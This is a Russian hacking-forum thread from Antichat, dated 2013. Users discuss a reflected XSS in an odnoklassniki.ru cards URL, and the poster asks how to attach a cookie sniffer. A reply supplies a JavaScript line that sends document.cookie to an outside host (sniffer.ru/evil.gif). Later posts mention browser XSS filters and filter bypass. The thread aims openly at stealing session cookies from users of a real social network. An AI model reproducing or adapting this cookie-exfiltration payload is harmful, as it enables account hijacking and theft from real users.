HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Перезагрузить страницу Пассивная XSS odnoklassniki.ru
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.01.2013, 08:16
DavidRog
Новичок
Регистрация: 01.09.2011
Сообщений: 7
С нами: 7735286

Репутация: 10
По умолчанию
Из соседней темы, взял эту пассивку.

Цитата:
Сообщение от _Spamer_  
Пассивная XSS odnoklassniki.ru
https://cards2.odnoklassniki.ru/index.html?ServiceDescr=XSS
Подставляя такое:

или

click me!

вылазит алерт.

Вопрос.. а как снифер сюда прикрутить ?
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 15.01.2013, 12:39
йож
Познающий
Регистрация: 31.08.2012
Сообщений: 50
С нами: 7209686

Репутация: 0
По умолчанию
img = new Image(); img.src = "http://sniffer.ru/evil.gif?"+document.cookie;
 
Ответить с цитированием

  #3  
Старый 15.01.2013, 13:54
DavidRog
Новичок
Регистрация: 01.09.2011
Сообщений: 7
С нами: 7735286

Репутация: 10
По умолчанию
Цитата:
Сообщение от йож  

img = new Image(); img.src = "http://sniffer.ru/evil.gif?"+document.cookie;

Ну дело в том, что если подставлять alert(/xss/), то алерт не вылетает.. соответственно и на снифер нечего не приходит..
 
Ответить с цитированием

  #4  
Старый 15.01.2013, 13:59
OxoTnik
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
С нами: 7854806

Репутация: 173


По умолчанию
Цитата:
Сообщение от DavidRog  
Ну дело в том, что если подставлять alert(/xss/), то алерт не вылетает.. соответственно и на снифер нечего не приходит..
Ты про обход фильтров что нибудь слышал?
 
Ответить с цитированием

  #5  
Старый 15.01.2013, 13:59
justonline
Постоянный
Регистрация: 27.07.2011
Сообщений: 499
С нами: 7787126

Репутация: 53
По умолчанию
Цитата:
Сообщение от DavidRog  
Ну дело в том, что если подставлять alert(/xss/), то алерт не вылетает.. соответственно и на снифер нечего не приходит..
хром и ие фильтруют пассивки
 
Ответить с цитированием

  #6  
Старый 15.01.2013, 13:59
йож
Познающий
Регистрация: 31.08.2012
Сообщений: 50
С нами: 7209686

Репутация: 0
По умолчанию
какой браузер?
 
Ответить с цитированием

  #7  
Старый 15.01.2013, 14:10
DavidRog
Новичок
Регистрация: 01.09.2011
Сообщений: 7
С нами: 7735286

Репутация: 10
По умолчанию
Цитата:
Сообщение от йож  
какой браузер?
пробовал через FF и CHROME.

вот так alert(/xss/) в коде хтмл вроде все ровно, но алерт не вылазит.

пару лет назад все получалось, а щас нет.

подумал просто что есть какой-то вариант не в теги выполнять произвольный код. а например в
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.